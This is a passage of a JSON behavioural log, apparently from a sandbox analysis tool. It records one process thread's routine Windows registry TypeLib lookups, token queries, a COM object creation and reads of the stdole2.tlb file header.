              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 1007
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000388"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000386"
              },
              {
                "name": "ObjectAttributesName",
                "value": "win64"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64"
              }
            ],
            "repeated": 0,
            "id": 1008
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000038a"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.TLB"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 1009
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000038a"
              }
            ],
            "repeated": 0,
            "id": 1010
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000386"
              }
            ],
            "repeated": 0,
            "id": 1011
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000382"
              }
            ],
            "repeated": 0,
            "id": 1012
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037e"
              }
            ],
            "repeated": 0,
            "id": 1013
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              }
            ],
            "repeated": 0,
            "id": 1014
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "00000346-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "E085AD58-B839-4625-B40B-4CC546E82D75"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1015
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020119",
                "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\MACHINE\\Software\\Classes\\PackagedCom"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\PackagedCom"
              }
            ],
            "repeated": 0,
            "id": 1016
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x00000378"
              }
            ],
            "repeated": 0,
            "id": 1017
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "20"
              },
              {
                "name": "TokenInformation",
                "value": "\\x01\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1018
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "18"
              },
              {
                "name": "TokenInformation",
                "value": "\\x01\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1019
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x80\\x85\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\xf0'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd8'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x86\\x7f\\x00\\x00\\x00\\x00\\x00!\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1020
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000037c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\User\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes"
              }
            ],
            "repeated": 0,
            "id": 1021
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000378"
              }
            ],
            "repeated": 0,
            "id": 1022
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037e"
              },
              {
                "name": "SubKey",
                "value": "TypeLib"
              },
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib"
              }
            ],
            "repeated": 0,
            "id": 1023
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037e"
              }
            ],
            "repeated": 0,
            "id": 1024
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037a"
              },
              {
                "name": "SubKey",
                "value": "{00020430-0000-0000-C000-000000000046}"
              },
              {
                "name": "Handle",
                "value": "0x0000037e"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}"
              }
            ],
            "repeated": 0,
            "id": 1025
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000037e"
              },
              {
                "name": "SubKey",
                "value": "2.0"
              },
              {
                "name": "Handle",
                "value": "0x00000382"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0"
              }
            ],
            "repeated": 0,
            "id": 1026
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000382"
              },
              {
                "name": "SubKey",
                "value": "0"
              },
              {
                "name": "Handle",
                "value": "0x00000386"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0"
              }
            ],
            "repeated": 0,
            "id": 1027
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000386"
              },
              {
                "name": "SubKey",
                "value": "win64"
              },
              {
                "name": "Handle",
                "value": "0x0000038a"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64"
              }
            ],
            "repeated": 0,
            "id": 1028
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000038a"
              }
            ],
            "repeated": 0,
            "id": 1029
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000386"
              }
            ],
            "repeated": 0,
            "id": 1030
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000382"
              },
              {
                "name": "SubKey",
                "value": "0"
              },
              {
                "name": "Handle",
                "value": "0x00000386"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0"
              }
            ],
            "repeated": 0,
            "id": 1031
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000386"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 1032
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000386"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 1033
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x90~\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x86\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\\x7f\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1034
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64"
              }
            ],
            "repeated": 0,
            "id": 1035
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000386"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 1036
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000388"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000386"
              },
              {
                "name": "ObjectAttributesName",
                "value": "win64"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64"
              }
            ],
            "repeated": 0,
            "id": 1037
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000038a"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 1038
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000038a"
              }
            ],
            "repeated": 0,
            "id": 1039
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000386"
              }
            ],
            "repeated": 0,
            "id": 1040
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000382"
              }
            ],
            "repeated": 0,
            "id": 1041
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037e"
              }
            ],
            "repeated": 0,
            "id": 1042
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              }
            ],
            "repeated": 0,
            "id": 1043
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 1044
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 1,
            "id": 1045
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "Buffer",
                "value": "MZ\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00"
              },
              {
                "name": "Length",
                "value": "64"
              }
            ],
            "repeated": 0,
            "id": 1046
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1047
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1048
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "Buffer",
                "value": "PE\\x00\\x00"
              },
              {
                "name": "Length",
                "value": "24"
              }
            ],
            "repeated": 0,
            "id": 1049
          },
          {
            "timestamp": "2025-11-20 10:58:33,922",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1050
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\xb0\\x01\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1051
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "Buffer",
                "value": ".rdata\\x00\\x00\\xb0\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00@"
              },
              {
                "name": "Length",
                "value": "80"
              }
            ],
            "repeated": 0,
            "id": 1052
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 1,
            "id": 1053
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1054
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "Buffer",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x01\\x00"
              },
              {
                "name": "Length",
                "value": "24"
              }
            ],
            "repeated": 0,
            "id": 1055
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000378"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\stdole2.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x18\\x04\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 1,
            "id": 1056
          },
          {
            "timestamp": "2025-11-20 10:58:33,937",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
